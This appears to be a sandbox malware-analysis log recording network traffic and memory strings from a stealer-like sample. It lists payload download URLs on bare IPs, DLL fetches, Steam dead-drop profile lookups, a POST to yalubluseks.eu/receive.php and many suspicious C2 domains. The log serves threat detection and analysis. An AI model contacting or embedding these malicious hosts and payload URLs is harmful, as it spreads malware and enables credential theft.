                            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET /ldms/66fb252fe232b_Patksl.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=d361dace66def6f89111ca50; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25489Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 02 Oct 2024 12:44:12 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NT AUTHORITY\SYSTEMmbWdtPWdtPWdtPF918-3AFD-1E8B-2169-0588ptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: yalubluseks.eu
                            Source: global trafficDNS traffic detected: DNS query: api64.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: iplogger.org
                            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                            Source: global trafficDNS traffic detected: DNS query: chorusarorp.site
                            Source: global trafficDNS traffic detected: DNS query: questionsmw.store
                            Source: global trafficDNS traffic detected: DNS query: soldiefieop.site
                            Source: global trafficDNS traffic detected: DNS query: abnomalrkmu.site
                            Source: global trafficDNS traffic detected: DNS query: treatynreit.site
                            Source: global trafficDNS traffic detected: DNS query: snarlypagowo.site
                            Source: global trafficDNS traffic detected: DNS query: mysterisop.site
                            Source: global trafficDNS traffic detected: DNS query: absorptioniw.site
                            Source: global trafficDNS traffic detected: DNS query: gravvitywio.store
                            Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                            Source: global trafficDNS traffic detected: DNS query: 55.235.10.0.in-addr.arpa
                            Source: unknownHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104
                            Source: RegAsm.exe, 00000006.00000002.2325722695.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/
                            Source: RegAsm.exe, 00000006.00000002.2325722695.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/W
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fb252fe232b_Patksl.exe
                            Source: RegAsm.exe, 00000023.00000002.3012453273.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe1kkkk1264816http://147.45.44.104/ldms/66fbfccd837a
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe3
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeEi
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeG
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeSi
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeki
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exerm-data;
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeyi
                            Source: RegAsm.exe, 00000023.00000002.3012453273.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exe
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exe&
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exe-data;
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exeC:
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exedll
                            Source: RegAsm.exe, 00000023.00000002.3012453273.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exe
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exeC:
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exeexe
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exeform-data;
                            Source: RegAsm.exe, 00000006.00000002.2327479029.0000000003E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.21
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000154A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2327479029.0000000003E91000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/
                            Source: RegAsm.exe, 00000006.00000002.2327479029.0000000003E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/K
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.php
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.php_
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.phpi
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.phpy
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000154A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2325722695.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-ping.php
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2327479029.0000000003E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190:80/api/wp-admin.php
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190:80/api/wp-admin.phpD
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190:80/api/wp-ping.php
